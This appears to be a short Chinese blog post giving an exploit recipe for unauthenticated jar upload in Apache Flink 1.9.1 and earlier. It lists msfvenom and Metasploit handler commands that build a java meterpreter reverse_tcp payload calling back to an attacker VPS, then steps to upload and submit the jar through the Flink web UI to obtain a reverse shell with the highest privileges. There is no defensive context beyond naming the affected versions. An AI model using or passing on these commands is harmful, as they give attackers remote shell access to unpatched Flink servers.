释放双眼,带上耳机,听听看~!
[rihide]
Apache-flink 未授权访问任意jar包上传反弹shell
影响版本: flink<=1.9.1
利用方法:
msf开启监听
`
msfvenom -p java/meterpreter/reverse_tcp LHOST=vpsip LPORT=6666 -f jar > flink.jar
use exploit/multi/handler
set payload java/shell/reverse_tcp
set LHOST vpsip
set LPORT 6666
`
触发条件:
访问ip:port/#/submit/submit
Upload flink.jar之后,点击已上传jar包,submit即可反弹最高权限shell
[/rihide]
声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。
